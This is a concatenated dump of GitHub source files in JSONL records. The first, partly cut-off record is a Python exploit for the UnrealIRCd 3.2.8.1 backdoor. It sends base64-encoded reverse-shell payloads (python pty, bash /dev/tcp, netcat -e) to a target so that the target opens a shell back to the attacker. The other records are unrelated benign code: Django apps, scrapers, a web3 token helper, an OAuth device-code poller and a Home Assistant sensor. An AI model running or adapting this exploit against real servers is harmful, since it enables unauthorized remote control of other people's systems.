different types of payloads that are supported\npython_payload = f'python -c \"import os;import pty;import socket;tLnCwQLCel=\\'{local_ip}\\';EvKOcV={local_port};QRRCCltJB=socket.socket(socket.AF_INET,socket.SOCK_STREAM);QRRCCltJB.connect((tLnCwQLCel,EvKOcV));os.dup2(QRRCCltJB.fileno(),0);os.dup2(QRRCCltJB.fileno(),1);os.dup2(QRRCCltJB.fileno(),2);os.putenv(\\'HISTFILE\\',\\'/dev/null\\');pty.spawn(\\'/bin/bash\\');QRRCCltJB.close();\" '\nbash_payload = f'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'\nnetcat_payload = f'nc -e /bin/bash {local_ip} {local_port}'\n\n# our socket to interact with and send payload\ntry:\n s = socket.create_connection((args.ip, args.port))\nexcept socket.error as error:\n print('connection to target failed...')\n print(error)\n \n# craft out payload and then it gets base64 encoded\ndef gen_payload(payload_type):\n base = base64.b64encode(payload_type.encode())\n return f'echo {base.decode()} |base64 -d|/bin/bash'\n\n# all the different payload options to be sent\nif args.payload == 'python':\n try:\n s.sendall((f'AB; {gen_payload(python_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n\nif args.payload == 'netcat':\n try:\n s.sendall((f'AB; {gen_payload(netcat_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n\nif args.payload == 'bash':\n try:\n s.sendall((f'AB; {gen_payload(bash_payload)} \\n').encode())\n except:\n print('connection made, but failed to send exploit...')\n \n#check display any response from the server\ndata = s.recv(1024)\ns.close()\nif data != '':\n print('Exploit sent successfully!')","repo_name":"Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"24088674131","text":"from split_settings.tools import include\n\n# imports all settings defined in the geoluminate/conf/settings/ directory\ninclude(\"settings/general.py\", \"settings/*.py\")\n\nINSTALLED_APPS = GEOLUMINATE_APPS + INSTALLED_APPS + [\"compressor\", \"django_extensions\"]\n\nDEBUG = True\n\n# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_ENABLED\nCOMPRESS_ENABLED = False # don't compress during development\n\n# http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\n# INSTALLED_APPS = [\"whitenoise.runserver_nostatic\", *GEOLUMINATE_APPS]\n\n# SOCIALACCOUNT_PROVIDERS[\"orcid\"][\"BASE_DOMAIN\"] = \"sandbox.orcid.org\"\n\nCOMPRESS_OFFLINE = False\n\n# https://docs.celeryq.dev/en/stable/userguide/configuration.html#task-eager-propagates\nCELERY_TASK_EAGER_PROPAGATES = True\n\n# INSTALLED_APPS += [\"django_extensions\"] # F405\n\nLOCKDOWN_ENABLED = False\n\nSTATICFILES_STORAGE = \"whitenoise.storage.CompressedStaticFilesStorage\"\n\n# BASE_SERIALIZER = \"geoluminate.api.serializers.HyperlinkedModelSerializer\"\n","repo_name":"Geoluminate/geoluminate","sub_path":"geoluminate/conf/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"3947040894","text":"#Take the value and index as inputs, and then, in return, have the output be the value of the \"piece\" at the reversed index\n#Hint: \"pieces\" are numbered sequentially from the first index\n\ndef reverse_piece(value, piece_index):\n b = bin(value)[2:]\n 
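# pieces are numbered from 1 starting at the least-significant bit; pad with leading zeros when the index exceeds the current width, then flip that bit\n 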
if piece_index > len(b): b = b.zfill(piece_index)\n index, b = len(b) - piece_index, list(b)\n b[index] = '1' if b[index] == '0' else '0'\n return int(''.join(b), 2)\n\nprint(reverse_piece(19,7))\n\n# To check your solution: calling the function with the inputs 19,7 (in place of value, piece_index) should output 83.\n","repo_name":"2020rkessler/main-folder","sub_path":"newkata.py","file_name":"newkata.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74659937444","text":"# Django default modules\nfrom django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.views.generic import View\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.context_processors import csrf\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.core.mail import send_mail\n\n# Python modules\nimport hashlib, datetime, random\n\n# Local modules\nfrom apps.giftyuser.models import User\nfrom apps.giftyuser.serializers import UserSerializer\nfrom apps.giftyuser.forms import UserForm, LoginForm\nfrom services.utilities import send_django_mail\n\n\n# Third party modules\nfrom rest_framework import viewsets\n\n# Create your views here.\n\n# ViewSets define the view behavior.\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n# Class Based Login View\nclass LoginView(View):\n\tdef get(self, request):\n\t\tform = LoginForm()\n\t\treturn render_to_response('giftyuser/login.html', locals(), context_instance=RequestContext(request))\n\n\tdef post(self, request):\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tusername = form.data['username']\n\t\t\tpassword = form.data['password']\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn HttpResponseRedirect(reverse('home'), locals())\n\t\treturn render_to_response('giftyuser/login.html', locals(), context_instance=RequestContext(request))\n\n\n# Class Based Logout View\nclass LogoutView(View):\n\tdef get(self, request):\n\t\tlogout(request)\n\t\treturn HttpResponseRedirect(reverse('home'), locals())\n\n# Class Based Signup View\nclass UserCreate(View):\n def get(self, request):\n form = UserForm()\n return render_to_response('auth/signup.html', locals(), context_instance=RequestContext(request))\n\n def post(self, request):\n form = UserForm(request.POST)\n if form.is_valid():\n new_user = form.save(commit=False)\n new_user.is_active = False\n new_user.set_password(form.data['password'])\n salt = hashlib.sha1(str(random.random())).hexdigest()[:5]\n new_user.activation_key = hashlib.sha1(salt+new_user.email).hexdigest()\n new_user.save()\n body = \"\\\n Click on this link to activate your account\\\n \" % (request.META['HTTP_ORIGIN'], new_user.activation_key)\n send_django_mail('MarbalNG Account Confirmation', 'isaac.e.ayodeji@gmail.com', [new_user.email], html_content=body)\n return HttpResponseRedirect(reverse('home'), locals())\n\n return render_to_response('auth/signup.html', locals(), context_instance=RequestContext(request))\n\n# Function to confirm user account\ndef register_confirm(request, activation_key):\n if request.user.is_active:\n return 
HttpResponseRedirect(reverse('home'))\n user = get_object_or_404(User, activation_key=activation_key)\n user.is_active = True\n user.save()\n send_django_mail('Welcome to MarbalNG', 'isaac.e.ayodeji@gmail.com', [user.email], 'Welcome to MarbalNG')\n return HttpResponseRedirect(reverse('login'))\n\n\n\n\n\n\n\n\n\n\n","repo_name":"emmanuel-isaac/gifty","sub_path":"apps/giftyuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26600674224","text":"import time\nimport requests\nfrom parsel import Selector\n\nfrom tech_news.database import create_news\n\n\ndef fetch(url):\n try:\n response = requests.get(\n url, headers={\"user-agent\": \"Fake user-agent\"}, timeout=3)\n time.sleep(1)\n response.raise_for_status()\n except (requests.HTTPError, requests.ReadTimeout):\n return None\n else:\n return response.text\n\n\ndef scrape_novidades(html_content):\n selector = Selector(html_content)\n return selector.css(\"a.cs-overlay-link::attr(href)\").getall()\n\n\ndef scrape_next_page_link(html_content):\n selector = Selector(html_content)\n return selector.css(\".next::attr(href)\").get()\n\n\ndef scrape_noticia(html_content):\n selector = Selector(html_content)\n return {\n \"url\": selector.css(\"link[rel=canonical]::attr(href)\").get(),\n \"title\": selector.css(\"h1.entry-title::text\").get().strip(),\n \"timestamp\": selector.css(\".meta-date::text\").get(),\n \"writer\": selector.css(\".author a::text\").get(),\n \"comments_count\": len(selector.css(\"#comments\").getall()),\n \"summary\": \"\".join(\n selector.css(\".entry-content > p:nth-of-type(1) *::text\").getall()\n ).strip(),\n \"tags\": selector.css(\".post-tags a::text\").getall(),\n \"category\": selector.css(\"div.meta-category .label::text\").get()\n }\n\n\ndef get_tech_news(amount):\n BASE_URL = \"https://blog.betrybe.com\"\n news = []\n\n while len(news) < amount:\n content = fetch(BASE_URL)\n links = scrape_novidades(content)\n\n for i in range(min(amount - len(news), len(links))):\n news.append(scrape_noticia(fetch(links[i])))\n\n BASE_URL = scrape_next_page_link(content)\n\n create_news(news)\n return news\n","repo_name":"NunesNathan/Trybe-Tech-News","sub_path":"tech_news/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5998897749","text":"#!/usr/bin/env python3\n\nimport json\n\nimport pandas as pd\n\nfrom cook_data import OUTPUT_PATH\nfrom utils import connect, parse_date\n\n\nif __name__ == '__main__':\n data = pd.read_csv(OUTPUT_PATH)\n data_json = json.loads(data.to_json(orient='records'))\n data_to_db = []\n for i in range(len(data_json)):\n start = parse_date(data_json[i]['start_at'])\n\n # get data for last 3 years\n if start.year < 2017:\n continue\n\n end = parse_date(data_json[i]['end_at'])\n duration = (end - start).total_seconds()\n # for now filter out all non-hourly counts\n if duration != 3600:\n continue\n\n data_json[i]['start_at'] = start\n data_json[i]['end_at'] = end\n data_json[i]['weekday'] = start.strftime('%A')\n data_json[i]['month'] = start.strftime('%B')\n data_json[i]['installed_at'] = parse_date(data_json[i]['installed_at'])\n data_to_db.append(data_json[i])\n\n # save to mongo\n db = connect()\n db.main.delete_many({})\n db.main.insert_many(data_to_db)\n\n print(f'Successfully insert {len(data_to_db)} documents. 
({len(data) - len(data_to_db)} filtered)')\n","repo_name":"babajka-at-junction/data","sub_path":"src/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31019529154","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Game',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('guess_count', models.PositiveSmallIntegerField(default=0)),\n ('outcome', models.CharField(max_length=4, choices=[(b'WIN', b'Win'), (b'LOSS', b'Loss')])),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('word', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='game',\n name='word',\n field=models.ForeignKey(to='hangman.Word'),\n preserve_default=True,\n ),\n ]\n","repo_name":"MattTheRed/hangman","sub_path":"hangman/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42015544289","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport urllib.request\nimport pandas as pd\n\n\n# In[2]:\n\n\nurl=\"https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M\"\npost_list_html=urllib.request.urlopen(url).read()\n\n\n# In[3]:\n\n\npostal=pd.read_html(post_list_html)\n\n\n# In[4]:\n\n\nprint(postal)\n\n\n# In[5]:\n\n\nfrom bs4 import BeautifulSoup\nsoup=BeautifulSoup(post_list_html,'lxml')\n\n\n# In[6]:\n\n\nsoup.text\n\n\n# In[7]:\n\n\nsoup.prettify()\n\n\n# In[8]:\n\n\nlen(postal)\n\n\n# In[9]:\n\n\nprint(postal[0])\n\n\n# In[10]:\n\n\npostal[0].columns\n\n\n# In[11]:\n\n\npostal[0].index\n\n\n# In[12]:\n\n\nimport numpy as np\npostal_array=np.array(postal[0])\ncode_postal=pd.DataFrame(postal_array,index=postal[0].index,columns=postal[0].columns)\n\n\n# In[13]:\n\n\ncode_postal.head()\n\n\n# In[14]:\n\n\ncode_postal.tail()\n\n\n# In[15]:\n\n\ncode_postalr=code_postal[code_postal[\"Borough\"]!=\"Not assigned\"]\n\n\n# In[16]:\n\n\nprint(code_postalr.head(10))\n\n\n# In[17]:\n\n\ncode_postalm=code_postalr.copy()\n\n\n# In[18]:\n\n\nprint(code_postalm.columns)\n\n\n# In[33]:\n\n\ncode_postalr.Neighbourhood[code_postalm.Neighbourhood==\"Not assigned\"]= code_postalm.loc[code_postalm.Neighbourhood==\"Not assigned\",'Borough']\n\n\n# In[20]:\n\n\ncode_postalr.head(10)\n\n\n# In[21]:\n\n\nmask=code_postalr.Postcode.duplicated(keep=False)\n\n\n# In[22]:\n\n\ncode_postalr[mask]\n\n\n# In[23]:\n\n\ncode_postalrw=code_postalr[~mask]\n\n\n# In[24]:\n\n\ncode_postalrw.head(10)\n\n\n# In[25]:\n\n\ncoder=code_postalr[mask]\n\n\n# In[26]:\n\n\ncoder.index\n\n\n# In[27]:\n\n\ncoder.Postcode\n\n\n# In[28]:\n\n\ncoderw=coder.drop_duplicates(subset=\"Postcode\",keep=\"first\")\n\n\n# In[29]:\n\n\ncoderw\n\n\n# In[30]:\n\n\nf=lambda x: ','.join(z for z in coder.loc[coder.Postcode==x,'Neighbourhood']) \n\n\n# 
In[31]:\n\n\nfor x in coderw.index:\n coderw.Neighbourhood[x]=f(coderw.Postcode[x])\n\n\n# In[32]:\n\n\ncoderw\n\n\n# In[43]:\n\n\ncode_full = pd.concat([code_postalrw,coderw], ignore_index='True')\n\n\n# In[44]:\n\n\ncode_full\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"sednabcn/Python-Capstone","sub_path":"Table_jupyter.py","file_name":"Table_jupyter.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39090056393","text":"from main import redis\nimport time\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Use a service account\ncred = credentials.Certificate('serviceAccount.json')\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\n\n\nkey = 'test_union'\ngroup = 'inventory-group'\n\ntry:\n redis.xgroup_create(key, group)\nexcept:\n print('Group already exists!')\n\nwhile True:\n try:\n results = redis.xreadgroup(group, key, {key: '>'}, None)\n\n if results != []:\n for result in results:\n obj = result[1][0][1]\n print(obj)\n\n data = {\n u'id': obj['id'],\n u'original_title': obj['original_title'],\n u'authors': obj['authors'],\n u'average_rating': obj['average_rating'],\n u'ratings_count': obj['ratings_count'],\n u'image_url': obj['image_url'],\n u'isbn': obj['isbn'],\n }\n\n # Add a new doc in collection 'cities' with ID 'LA'\n db.collection(u'books').add(data)\n\n except Exception as e:\n print(str(e))\n time.sleep(1)\n","repo_name":"nurrizkyimani/scalable_ml_model","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33370809649","text":"import datetime\nimport logging\nimport requests # type: ignore\nimport threading\nimport time\nimport urllib\nfrom typing import Any\nfrom typing import Dict\n\n\nclass Poll:\n \"\"\"Device code authentication polling handler\n\n Based on:\n https://github.com/secureworks/squarephish/blob/main/squarephish/modules/server/auth.py\n \"\"\"\n\n @classmethod\n def run(\n cls,\n device_code: Dict[str, Any],\n client_id: str,\n scope: str,\n proxies: Dict[str, str] = None,\n verify: bool = True,\n ) -> Dict[str, Any]:\n \"\"\"Poll the MS token endpoint for valid authentication\n\n :param device_code: device code json response\n :param client_id: client id requested for the token\n :param scope: requested token scope\n :param proxies: http request proxy\n :param verify: http request certificate verification\n :returns: token json response\n \"\"\"\n if proxies:\n verify = False\n\n # Generate POST request data for polling Microsoft for authentication\n url = \"https://login.microsoftonline.com/organizations/oauth2/v2.0/token\"\n params = (\n (\"grant_type\", \"urn:ietf:params:oauth:grant-type:device_code\"),\n (\"code\", device_code[\"device_code\"]),\n (\"client_id\", client_id),\n (\"scope\", scope),\n )\n data = urllib.parse.urlencode(params)\n\n # Poll only for the time given before the device code expires\n expires_in = int(device_code[\"expires_in\"]) / 60\n end_delta = datetime.timedelta(minutes=expires_in)\n stop_time = datetime.datetime.now() + end_delta\n\n while True:\n logging.debug(f\"Polling for oAuth authentication\")\n response = requests.post(\n url,\n data=data,\n proxies=proxies,\n verify=verify,\n )\n\n # Successful auth\n if response.status_code == 200:\n break\n\n # Bad response\n if response.json()[\"error\"] != 
\"authorization_pending\":\n logging.error(f\"Invalid poll response:\\n{response.json()}\")\n return None\n\n # Handle device code expiration/timeout\n if datetime.datetime.now() >= stop_time:\n logging.error(f\"Device code expired\")\n return None\n\n # Wait the provided interval time between polls\n time.sleep(int(device_code[\"interval\"]))\n\n # Grab the token response\n token_response = response.json()\n return token_response\n\n\nclass PollThread(threading.Thread):\n \"\"\"Custom threading class to poll for device code authentication\"\"\"\n\n def __init__(\n self,\n group=None,\n target=None,\n name=None,\n args=(),\n kwargs={},\n Verbose=None,\n ):\n \"\"\"Initialize polling thread\"\"\"\n threading.Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n\n def join(self, *args):\n \"\"\"Override join to return value\"\"\"\n threading.Thread.join(self, *args)\n return self._return\n\n def run(self):\n \"\"\"Override run to return value\"\"\"\n if self._target is not None:\n self._return = self._target(*self._args, **self._kwargs)\n","repo_name":"secureworks/TokenMan","sub_path":"tokenman/oauth/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"52"} +{"seq_id":"71175402726","text":"import unittest\nimport itertools\n\nimport main\n\nclass CircuitTest(unittest.TestCase):\n\n def test_get_v_from_angle_range(self):\n \"\"\" Test to confirm that voltage values are in range with Circuit method. \"\"\"\n # Create inputs\n circuit = main.Circuit()\n deg_lmt, sclr_lmt, cnst_lmt = 360, 10, 10\n input_possibilities = itertools.product(\n [i for i in range(deg_lmt)],\n [sclr_lmt*i/100 for i in range(100)],\n [cnst_lmt*i/100 for i in range(100)],\n )\n for input_possibility in input_possibilities:\n deg,sclr,cnst = input_possibility[0], input_possibility[1], input_possibility[2]\n value_max = abs(sclr) + cnst\n value_min = cnst - abs(sclr)\n # Now, test math.sin\n val = circuit.get_v_from_angle(deg, main.math.sin, sclr, cnst)\n assert type(val) == type(value_max) and type(val) == type(value_min), type(val)\n assert val >= value_min, \"Degree,Scalar,Constant | {}\".format(input_possibility)\n assert val <= value_max, \"Degree,Scalar,Constant | {}\".format([input_possibility, val])\n # Now, test math.cos\n val = circuit.get_v_from_angle(deg, main.math.cos, sclr, cnst)\n assert type(val) == type(value_max) and type(val) == type(value_min), type(val)\n assert val >= value_min, \"Degree,Scalar,Constant | {}\".format(input_possibility)\n assert val <= value_max, \"Degree,Scalar,Constant | {}\".format([input_possibility, val])\n\n","repo_name":"Racerin/Brain-Storm","sub_path":"TPS Hall sensor calculations/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34663481260","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom user.models import UserProfile\n# Create your models here.\nclass SavingsGoals(models.Model):\n GOAL_CATEGORY=((\"financial\",\"Financial\"),(\"personal\",\"Personal\"),)\n user=models.ForeignKey(UserProfile,on_delete=models.CASCADE)\n title=models.CharField(max_length=255)\n target_amount=models.DecimalField(max_digits=255,decimal_places=2)\n due_date=models.DateField()\n progress=models.TextField()\n notes=models.TextField()\n 
category=models.CharField(max_length=255,choices=GOAL_CATEGORY)\n alert=models.BooleanField(default=True)\n created_at=models.DateTimeField(auto_now_add=True)\n updated_at=models.DateTimeField(auto_now=True)\n\n \n","repo_name":"Loice-KaniniMwau/CHAMA_BACKEND_LOGIC","sub_path":"savingsgoals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2235455848","text":"import os\nfrom web3 import Web3\nfrom dotenv import load_dotenv\nimport json\n\nload_dotenv()\nnode_provider = os.environ['NODE_PROVIDER']\nweb3_connection = Web3(Web3.HTTPProvider(node_provider))\n\ndef are_we_connected():\n return web3_connection.isConnected()\n\ndef build_contract(contract_address, abi_path):\n with open(abi_path) as f:\n abiJson = json.load(f)\n contract = web3_connection.eth.contract(address=contract_address, abi=abiJson['abi'])\n return contract\n\ndef get_address(private_key):\n return web3_connection.eth.account.from_key(private_key).address\n\ndef transfer(_contract, _to, _amount, _signature):\n nonce = web3_connection.eth.get_transaction_count(get_address(_signature))\n function_call = _contract.functions.transfer(_to, _amount).buildTransaction({'nonce':nonce})\n signed_transaction = web3_connection.eth.account.sign_transaction(function_call, _signature)\n result = web3_connection.eth.send_raw_transaction(signed_transaction.rawTransaction)\n return result\n\ndef allowanceUp(_contract, _to, _amount, _signature):\n nonce = web3_connection.eth.get_transaction_count(get_address(_signature))\n function_call = _contract.functions.increaseAllowance(_to, _amount).buildTransaction({'nonce':nonce})\n signed_transaction = web3_connection.eth.account.sign_transaction(function_call, _signature)\n result = web3_connection.eth.send_raw_transaction(signed_transaction.rawTransaction)\n return result\n","repo_name":"DanielMoralisSamples/Video_Tutorials","sub_path":"03A-token_dapp/token_dapp.py","file_name":"token_dapp.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"34515915747","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\n\n\n\ndef charReplacement(inputFilePath, outputFileDir, charToReplace, replacementChar):\n\tinputPathArray = inputFilePath.split(\"/\")\n\tinputName = inputPathArray[len(inputPathArray) - 1]\n\tinputNameArray = inputName.split(\".\")\n\toutputName = inputNameArray[0] + \"_replaced\" + \".txt\"\n\toutputPath = os.path.join(outputFileDir, outputName)\n\tprint((\"InputFilePath: \" + inputFilePath))\n\tprint((\"InputFileName: \" + inputName))\n\tprint((\"OutputFileName: \" + outputName))\n\tprint((\"OutputFilePath: \" + outputPath))\n\twith open(inputFilePath, \"r\") as inputFile:\n\t\tfileData = inputFile.read()\n\t\tfileData = fileData.replace(charToReplace, replacementChar)\n\t\tinputFile.close()\n\twith open(outputPath, \"w\") as outputFile:\n\t\toutputFile.write(fileData)\n\t\toutputFile.close()\n\n\ndef main():\n\tinputFilePath = sys.argv[1]\n\toutputFilePath = sys.argv[2]\n\tcharToReplace = sys.argv[3]\n\treplacementChar = sys.argv[4]\n\tcharReplacement(inputFilePath, outputFilePath, charToReplace, 
replacementChar)\n\nmain()\n","repo_name":"melimat/Datalogging","sub_path":"Commas-replacement.py","file_name":"Commas-replacement.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25043349925","text":"\"\"\"\r\nSimple service for SL (Storstockholms Lokaltrafik)\r\n\r\n\r\n\"\"\"\r\nimport datetime\r\nfrom datetime import timedelta\r\nimport logging\r\n\r\nimport voluptuous as vol\r\nimport requests\r\n\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\r\nfrom homeassistant.helpers.aiohttp_client import async_get_clientsession\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.helpers.event import (\r\n async_track_point_in_utc_time, async_track_utc_time_change)\r\nfrom homeassistant.util import dt as dt_util\r\n\r\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.util import Throttle\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nCONF_RI4_KEY = 'ri4key'\r\nCONF_SITEID = 'siteid'\r\nCONF_LINES = 'lines'\r\nCONF_NAME = 'name'\r\nCONF_DIRECTION = 'direction'\r\n\r\nUPDATE_FREQUENCY = timedelta(seconds=60)\r\nFORCED_UPDATE_FREQUENCY = timedelta(seconds=5)\r\n\r\nUSER_AGENT = \"Home Assistant SL Sensor\"\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\r\n vol.Required(CONF_RI4_KEY): cv.string, \r\n vol.Required(CONF_SITEID): cv.string,\r\n vol.Optional(CONF_LINES): cv.string,\r\n vol.Optional(CONF_NAME): cv.string,\r\n vol.Optional(CONF_DIRECTION) : cv.string\r\n\r\n})\r\n\r\n\r\ndef setup_platform(hass, config, add_devices, discovery_info=None):\r\n \"\"\"Setup the sensors.\r\n \r\n right now only one, but later there should probably be another sensor for deviations at the same site\r\n \"\"\"\r\n\r\n data = SlDepartureBoardData(\r\n config.get(CONF_RI4_KEY),\r\n config.get(CONF_SITEID),\r\n config.get(CONF_LINES),\r\n config.get(CONF_DIRECTION)\r\n )\r\n\r\n sensors = []\r\n sensors.append(\r\n SLDepartureBoardSensor(\r\n data, \r\n config.get(CONF_SITEID),\r\n config.get(CONF_NAME)\r\n )\r\n )\r\n add_devices(sensors)\r\n\r\nclass SLDepartureBoardSensor(Entity):\r\n \"\"\"Department board for one SL site.\"\"\"\r\n\r\n def __init__(self, data, siteid, name):\r\n \"\"\"Initialize\"\"\"\r\n self._sensor = 'sl'\r\n self._siteid = siteid\r\n self._name = name or siteid\r\n self._data = data\r\n self._nextdeparture = 9999\r\n self._board = []\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return '{} {}'.format(self._sensor, self._name)\r\n\r\n @property\r\n def icon(self):\r\n \"\"\" Return the icon for the frontend.\"\"\"\r\n return 'fa-subway'\r\n\r\n @property\r\n def state(self):\r\n \"\"\" Return number of minutes to the next departure \"\"\"\r\n if len(self._board) > 0:\r\n return self._board[0]['time']\r\n\r\n return 9999\r\n\r\n @property\r\n def device_state_attributes(self):\r\n \"\"\" Return the sensor attributes .\"\"\"\r\n\r\n val = {}\r\n val['attribution'] = 'Data from sl.se / trafiklab.se'\r\n val['unit_of_measurement'] = 'min'\r\n\r\n if not(self._data.data) :\r\n return val\r\n\r\n if len(self._board) > 0:\r\n val['next_line'] = self._board[0]['line']\r\n val['next_destination'] = self._board[0]['destination']\r\n val['next_departure'] = self._board[0]['departure']\r\n\r\n if len(self._board) > 
1:\r\n val['upcoming_line'] = self._board[1]['line']\r\n val['upcoming_destination'] = self._board[1]['destination']\r\n val['upcoming_departure'] = self._board[1]['departure']\r\n \r\n return val\r\n\r\n def parseDepartureTime(self, t):\r\n \"\"\" weird time formats from the API, do some quick and dirty conversions \"\"\"\r\n\r\n try: \r\n if t == 'Nu':\r\n return 0\r\n\r\n s = t.split()\r\n if(len(s) > 1 and s[1] == 'min'):\r\n return int(s[0])\r\n\r\n s = t.split(':')\r\n if(len(s) > 1):\r\n now = datetime.datetime.now()\r\n min = (int(s[0])*60 + int(s[1])) - (now.hour*60 + now.minute)\r\n if min < 0: \r\n min = min + 1440\r\n return min\r\n\r\n except Exception:\r\n _LOGGER.error('Failed to parse departure time (%s) ', t)\r\n\r\n return 0\r\n \r\n def update(self):\r\n \"\"\"Get the departure board.\"\"\"\r\n\r\n self._data.update()\r\n\r\n board = []\r\n if self._data.data['StatusCode'] != 0:\r\n _LOGGER.error(\"Status code: {}, {}\".format(self._data.data['StatusCode'], self._data.data['Message']))\r\n else:\r\n for i,traffictype in enumerate(['Metros','Buses','Trains','Trams', 'Ships']):\r\n for idx, value in enumerate(self._data.data['ResponseData'][traffictype]):\r\n direction = value['JourneyDirection'] or 0\r\n displaytime = value['DisplayTime'] or ''\r\n destination = value['Destination'] or ''\r\n linenumber = value['LineNumber'] or ''\r\n \r\n if (int(self._data._direction) == 0 or int(direction) == int(self._data._direction)):\r\n if(self._data._lines is None or (linenumber in self._data._lines)):\r\n diff = self.parseDepartureTime(displaytime)\r\n board.append({\"line\":linenumber,\"departure\":displaytime,\"destination\":destination, 'time': diff})\r\n \r\n self._board = sorted(board, key=lambda k: k['time'])\r\n\r\n _LOGGER.info(self._board)\r\n\r\n \r\nclass SlDepartureBoardData(object):\r\n \"\"\" Class for retrieving API data \"\"\"\r\n def __init__(self, apikey, siteid, lines, direction):\r\n \"\"\"Initialize the data object.\"\"\"\r\n self._apikey = apikey\r\n self._siteid = siteid\r\n self._lines = lines \r\n self._direction = direction or 0\r\n self.data = {}\r\n\r\n @Throttle(UPDATE_FREQUENCY, FORCED_UPDATE_FREQUENCY)\r\n def update(self, **kwargs):\r\n \"\"\"Get the latest data for this site from the API.\"\"\"\r\n try:\r\n _LOGGER.info(\"fetching SL Data for '%s'\", self._siteid)\r\n url = \"https://api.sl.se/api2/realtimedeparturesV4.json?key={}&siteid={}\". \\\r\n format(self._apikey, self._siteid)\r\n\r\n req = requests.get(url, headers={\"User-agent\": USER_AGENT}, allow_redirects=True, timeout=5)\r\n\r\n except requests.exceptions.RequestException:\r\n _LOGGER.error(\"failed fetching SL Data for '%s'\", self._siteid)\r\n return\r\n\r\n if req.status_code == 200:\r\n self.data = req.json()\r\n\r\n else:\r\n _LOGGER.error(\"failed fetching SL Data for '%s'\"\r\n \"(HTTP Status_code = %d)\", self._siteid,\r\n req.status_code) 